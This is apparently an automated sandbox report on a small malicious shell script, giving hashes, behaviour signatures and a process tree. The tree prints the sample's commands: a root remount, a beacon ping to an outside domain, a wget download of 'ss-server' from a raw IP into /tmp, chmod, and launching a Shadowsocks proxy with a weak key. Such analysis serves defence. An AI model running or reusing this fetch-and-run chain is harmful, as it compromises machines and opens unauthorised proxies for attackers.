Analysis
max time kernel: 1030s
max time network: 132s
platform: debian-9_armhf
resource: debian9-armhf-20221111-en
resource tags: arch:armhf, image:debian9-armhf-20221111-en, kernel:4.9.0-13-armmp-lpae, locale:en-us, os:debian-9-armhf, system
submitted: 23-11-2022 15:40
Static task: static1
Behavioral task: behavioral1 (Sample: samx.sh, Resource: ubuntu1804-amd64-en-20211208)
Behavioral task: behavioral2 (Sample: samx.sh, Resource: debian9-armhf-20221111-en)
Behavioral task: behavioral3 (Sample: samx.sh, Resource: debian9-mipsbe-20221111-en)
Behavioral task: behavioral4 (Sample: samx.sh, Resource: debian9-mipsel-20221111-en)
General
Target: samx.sh
Size: 400B
MD5: 6039cf7d6cc1378682e1a983fcaba7a8
SHA1: 3ca4e29546ca125fd98429768ae0fd44182ccdee
SHA256: af2bc5dda7b0ae47a3ccd286afa17718b4e81daf944a8784e445e597dbbdcd28
SHA512: 4119e1787b6edcc2639f0266308aea50891e67ea23404a060dd46bea082bc26033d8aafb93c06c084c391e141f838eacf21433cf94aabf1bf1e7b8e393504253
Malware Config
Signatures

Modifies hosts file (1 IoC)
Adds to hosts file used for mapping hosts to IP addresses.
Processes: ping
  description    ioc           process
  /etc/hosts     /etc/hosts    ping

Writes DNS configuration (1 TTP, 2 IoCs)
Writes data to DNS resolver config file.
Processes: ping, ss-server
  description         ioc                 process
  /etc/resolv.conf    /etc/resolv.conf    ping
  /etc/resolv.conf    /etc/resolv.conf    ss-server

Reads runtime system information (3 IoCs)
Reads data from /proc virtual filesystem.
Processes: mount, sed, sed
  description          ioc                  process
  /proc/filesystems    /proc/filesystems    mount
  /proc/filesystems    /proc/filesystems    sed
  /proc/filesystems    /proc/filesystems    sed

Writes file to tmp directory (2 IoCs)
Malware often drops required files in the /tmp directory.
Processes: samx.sh, wget
  description       ioc               process
  /tmp/samx.sh      /tmp/samx.sh      samx.sh
  /tmp/ss-server    /tmp/ss-server    wget
Processes (indented entries are child processes of the entry above)

/tmp/samx.sh
  Command: /tmp/samx.sh
  PID: 374
  - Writes file to tmp directory
    /bin/sleep
      Command: sleep 120
      PID: 375
    /bin/mount
      Command: mount -no "remount,rw" /
      PID: 402
      - Reads runtime system information
    /bin/ping
      Command: ping -c 4 samx-.subdomain.llzxs.com
      PID: 410
      - Modifies hosts file
      - Writes DNS configuration
    /usr/bin/wget
      Command: wget -P /tmp/ http://185.135.73.148:800/ss-server
      PID: 411
      - Writes file to tmp directory
    /bin/sleep
      Command: sleep 10
      PID: 445
    /bin/chmod
      Command: chmod +x /tmp/ss-server
      PID: 515

/bin/sed
  Command: sed "s/ /-/g"
  PID: 405
  - Reads runtime system information

/bin/grep
  Command: grep "inet addr"
  PID: 408

/bin/sed
  Command: sed -r "s/ +inet addr:([0-9.]+) .+/\\1/g"
  PID: 409
  - Reads runtime system information

/tmp/ss-server
  Command: /tmp/ss-server -s 0.0.0.0 -p 8300 -m aes-256-cfb -k 123456
  PID: 517
  - Writes DNS configuration